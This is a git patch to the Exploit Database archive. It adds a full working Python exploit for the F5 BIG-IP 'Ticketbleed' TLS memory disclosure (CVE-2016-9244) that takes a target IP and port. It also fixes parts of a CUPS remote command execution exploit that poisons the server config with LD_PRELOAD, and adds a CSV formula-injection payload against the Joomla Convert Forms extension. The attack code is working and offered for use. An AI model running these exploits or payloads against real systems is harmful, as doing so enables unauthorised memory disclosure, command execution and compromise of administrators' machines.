From a8b515dd6de24e57dd8fec47781c4139fdefb60c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 13 Apr 2018 05:01:51 +0000 Subject: [PATCH] DB: 2018-04-13 3 changes to exploits/shellcodes F5 BIG-IP SSL Virtual Server - Memory Disclosure F5 BIG-IP SSL Virtual Server - 'Ticketbleed' Memory Disclosure F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure Joomla Convert Forms version 2.0.3 - Formula Injection (CSV Injection) --- exploits/hardware/remote/44446.py | 152 ++++++++++++++++++++++++++++++ exploits/linux/remote/41233.py | 14 ++- exploits/php/webapps/44447.txt | 30 ++++++ files_exploits.csv | 4 +- 4 files changed, 194 insertions(+), 6 deletions(-) create mode 100755 exploits/hardware/remote/44446.py create mode 100644 exploits/php/webapps/44447.txt diff --git a/exploits/hardware/remote/44446.py b/exploits/hardware/remote/44446.py new file mode 100755 index 000000000..9f150633a --- /dev/null +++ b/exploits/hardware/remote/44446.py @@ -0,0 +1,152 @@ +# -*- coding: utf-8 -*- +#!/usr/bin/python +# Exploit Title: Ticketbleed +# Google Dork: n/a +# Date: Exploit: 02/13/17, Advisory Published: 02/09/17 +# Exploit Author: @0x00string +# Vendor Homepage: https://f5.com/ +# Software Link: https://support.f5.com/csp/article/K05121675 +# Version: see software link for versions +# Tested on: F5 BIGIP 11.6 +# CVE : CVE-2016-9244 +# require: scapy_ssl_tls (https://github.com/tintinweb/scapy-ssl_tls) +import re, getopt, sys, socket +from struct import * +try: + from scapy_ssl_tls.ssl_tls import * +except ImportError: + from scapy.layers.ssl_tls import * + +def banner(): + print ''' + lol ty filippo! + ty tintinweb! + 0000000000000 + 0000000000000000000 00 + 00000000000000000000000000000 + 0000000000000000000000000000000 + 000000000 0000000000 + 00000000 0000000000 + 0000000 000000000000 + 0000000 000000000000000 + 000000 000000000 000000 +0000000 000000000 000000 +000000 000000000 000000 +000000 000000000 000000 +000000 00000000 000000 +000000 000000000 000000 +0000000 000000000 0000000 + 000000 000000000 000000 + 0000000000000000 0000000 + 0000000000000 0000000 + 00000000000 00000000 + 00000000000 000000000 + 0000000000000000000000000000000 + 00000000000000000000000000000 + 000 0000000000000000000 + 0000000000000 + @0x00string +https://github.com/0x00string/oldays/blob/master/CVE-2016-9244.py +''' + +def usage (): + print ("python script.py \n" + " -h, --help: Show this message\n" + " -a, --rhost: Target IP address\n" + " -b, --rport: Target port\n" + "\n\n" + "Examples:\n" + "python script.py -a 10.10.10.10 -b 443\n" + "python script.py --rhost 10.10.10.10 --rport 8443") + exit() + +def pretty (t, m): + if (t is "+"): + print "\x1b[32;1m[+]\x1b[0m\t" + m + "\n", + elif (t is "-"): + print "\x1b[31;1m[-]\x1b[0m\t" + m + "\n", + elif (t is "*"): + print "\x1b[34;1m[*]\x1b[0m\t" + m + "\n", + elif (t is "!"): + print "\x1b[33;1m[!]\x1b[0m\t" + m + "\n", + +def createDump (input): + d, b, h = '', [], [] + u = list(input) + for e in u: + h.append(e.encode("hex")) + if e == '0x0': + b.append('0') + elif 30 > ord(e) or ord(e) > 128: + b.append('.') + elif 30 < ord(e) or ord(e) < 128: + b.append(e) + + i = 0 + while i < len(h): + if (len(h) - i ) >= 16: + d += ' '.join(h[i:i+16]) + d += " " + d += ' '.join(b[i:i+16]) + d += "\n" + i = i + 16 + else: + d += ' '.join(h[i:(len(h) - 0 )]) + pad = len(' '.join(h[i:(len(h) - 0 )])) + d += ' ' * (56 - pad) + d += ' '.join(b[i:(len(h) - 0 )]) + d += "\n" + i = i + len(h) + return d + +def ticketBleed (rhost, rport): + h = (rhost,int(rport)); + version = TLSVersion.TLS_1_2 + secret = "" + session_ticket = "" + sid = "" + cipher = TLSCipherSuite.ECDHE_RSA_WITH_AES_256_CBC_SHA + with TLSSocket(socket.socket(), client=True) as sock: + sock.connect(h) + ctx = sock.tls_ctx + packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=version, cipher_suites=TLS_CIPHER_SUITES.keys(), extensions=[TLSExtension() / TLSExtSessionTicketTLS(data="")]) + sock.sendall(packet) + sock.recvall() + packet_ke = TLSRecord(version=version) / TLSHandshake() / ctx.get_client_kex_data() + packet_ccs = TLSRecord(version=TLSVersion.TLS_1_2) / TLSChangeCipherSpec() + sock.sendall(TLS.from_records([packet_ke, packet_ccs])) + sock.sendall(to_raw(TLSFinished(), ctx)) + ret = sock.recvall() + session_ticket = ret[TLSSessionTicket].ticket + secret = ctx.master_secret + #pretty("*", "ctx 1: \n" + str(ctx)) + with TLSSocket(socket.socket(), client=True) as sock: + sock.connect(h) + ctx = sock.tls_ctx + packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=TLSVersion.TLS_1_2, cipher_suites=TLS_CIPHER_SUITES.keys(), session_id="A", extensions=[TLSExtension() / TLSExtSessionTicketTLS(data=session_ticket)]) + sock.tls_ctx.resume_session(secret) + sock.sendall(packet) + ret = sock.recvall() + sid = ret[TLSServerHello].session_id + #pretty("*", "ctx 2: \n" + str(ctx)) + pretty("+", "bled 'A' + 31 bytes: \n" + createDump(sid)) + +def main(): + rhost = None; + rport = None; + options, remainder = getopt.getopt(sys.argv[1:], 'a:b:h:', ['rhost=','rport=','help',]) + for opt, arg in options: + if opt in ('-h', '--help'): + usage() + elif opt in ('-a','--rhost'): + rhost = arg; + elif opt in ('-b','--rport'): + rport = arg; + banner() + if rhost is None or rport is None: + usage() + ticketBleed(rhost,rport) + exit(0); + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/linux/remote/41233.py b/exploits/linux/remote/41233.py index 10ebec8bb..b338b9a05 100755 --- a/exploits/linux/remote/41233.py +++ b/exploits/linux/remote/41233.py @@ -40,7 +40,7 @@ def banner(): 000 0000000000000000000 0000000000000 @0x00string -github.com/0x00string/oldays/CVE-2015-1158.py +https://github.com/0x00string/oldays/blob/master/CVE-2015-1158.py ''' def usage (): @@ -140,10 +140,13 @@ def locatePrinters(rhost, rport="631"): if m is not None: printer = m.group(1) pretty("+","printer found: " + printer) + return printer + else: + pretty("-","no printers") + exit(1) else: pretty("-","no printers") exit(1) - return printer def preparePayload(libpath): with open(libpath, 'rb') as f: @@ -226,7 +229,7 @@ def seedTarget(rhost, rport, printer, payload): "\x0d\x0a") sendJobRequest = http_header2 + send_document_packet - blah2 = txrx("172.20.32.3",631,"tcp",sendJobRequest) + blah2 = txrx(rhost,int(rport),"tcp",sendJobRequest) pretty("*","\n" + createDump(blah) + "\n") pretty("*","job id: " + jobid) return jobid @@ -478,13 +481,14 @@ def putConfig(rhost, rport, config): pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_request + config))) def poisonConfig(config, name): - config = config + "\x0a\x0aSetEnv LD_PRELOAD /var/spool/cups/d00" + name + "-001\x0a" + config = config + "\x0a\x0aSetEnv LD_PRELOAD /var/spool/cups/d000" + name + "-001\x0a" return config def main(): rhost = None; + rport = None; noshell = None; - options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:f:h:', ['rhost=','rport=','lib=','stomp-only','help',]) + options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','lib=','stomp-only','help']) for opt, arg in options: if opt in ('-h', '--help'): usage() diff --git a/exploits/php/webapps/44447.txt b/exploits/php/webapps/44447.txt new file mode 100644 index 000000000..565eca5b6 --- /dev/null +++ b/exploits/php/webapps/44447.txt @@ -0,0 +1,30 @@ +# Exploit Title: Joomla Extension Convert Forms version 2.0.3 - Formula Injection (CSV Injection) +# Google Dork: N/A +# Date: 12-04-2018 +################################ +# Exploit Author: Jetty Sairam +################################ +# Software Link: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/forms/convert-forms/ +# Affected Version: 2.03 and before +#Category: Plugins and Extensions +# Tested on: WiN7_x64 +# CVE : CVE-2018-10063 + +1. Application Description: + Convert Forms provides a framework to build custom forms for Joomla users. + +2. Technical Description: +Custom Forms version 2.0.3 is affected by the vulnerability Remote Command Execution using CSV Injection. This allows a public user to inject commands as a part of form fields and when a user with higher privilege exports the form data in CSV opens the file on their machine, the command is executed. + +3. Proof Of Concept: +Enter the payload @SUM(1+1)*cmd|' /C calc'!A0 in the form fields and submit. +When high privileged user logs into the application to export form data in CSV and opens the file. +Formula gets executed and calculator will get popped in his machine. + +4. Solution: +Upgrade to version 2.0.4 +https://extensions.joomla.org/extensions/extension/contacts-and-feedback/forms/convert-forms/ + +5. Reference: +https://www.tassos.gr/blog/convert-forms-2-0-4-security-release +https://vel.joomla.org/articles/2140-introducing-csv-injection \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 748b2e346..06a3f771d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -16086,7 +16086,7 @@ id,file,description,date,author,type,platform,port 41233,exploits/linux/remote/41233.py,"CUPS < 2.0.3 - Remote Command Execution",2017-02-03,@0x00string,remote,linux, 41236,exploits/hardware/remote/41236.py,"Netwave IP Camera - Password Disclosure",2017-02-03,spiritnull,remote,hardware, 41297,exploits/multiple/remote/41297.rb,"HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit)",2017-02-10,MaKyOtOx,remote,multiple, -41298,exploits/hardware/remote/41298.txt,"F5 BIG-IP SSL Virtual Server - Memory Disclosure",2017-02-10,"Ege Balci",remote,hardware, +41298,exploits/hardware/remote/41298.txt,"F5 BIG-IP SSL Virtual Server - 'Ticketbleed' Memory Disclosure",2017-02-10,"Ege Balci",remote,hardware, 41358,exploits/php/remote/41358.rb,"Piwik 2.14.0/2.16.0/2.17.1/3.0.1 - Superuser Plugin Upload (Metasploit)",2017-02-14,Metasploit,remote,php,80 41366,exploits/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",remote,java, 41436,exploits/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Remote Buffer Overflow (SEH)",2017-02-22,"Peter Baris",remote,windows, @@ -16389,6 +16389,7 @@ id,file,description,date,author,type,platform,port 44376,exploits/windows/remote/44376.py,"Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow",2018-03-30,"Chris Lyne",remote,windows,4592 44398,exploits/hardware/remote/44398.py,"Moxa AWK-3131A 1.4 < 1.7 - 'Username' OS Command Injection",2017-04-03,Talos,remote,hardware, 44415,exploits/android/remote/44415.txt,"LineageOS 14.1 Blueborne - Remote Code Execution",2018-04-06,"Marcin Kozlowski",remote,android, +44446,exploits/hardware/remote/44446.py,"F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure",2017-02-14,@0x00string,remote,hardware, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -39141,3 +39142,4 @@ id,file,description,date,author,type,platform,port 44441,exploits/linux/webapps/44441.txt,"Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control",2018-04-10,SlidingWindow,webapps,linux, 44443,exploits/php/webapps/44443.txt,"WordPress Plugin File Upload 4.3.2 - Stored Cross-Site Scripting",2018-04-10,ManhNho,webapps,php, 44444,exploits/php/webapps/44444.txt,"WordPress Plugin File Upload 4.3.3 - Stored Cross-Site Scripting (PoC)",2018-04-10,ManhNho,webapps,php, +44447,exploits/php/webapps/44447.txt,"Joomla Convert Forms version 2.0.3 - Formula Injection (CSV Injection)",2018-04-12,"Sairam Jetty",webapps,php,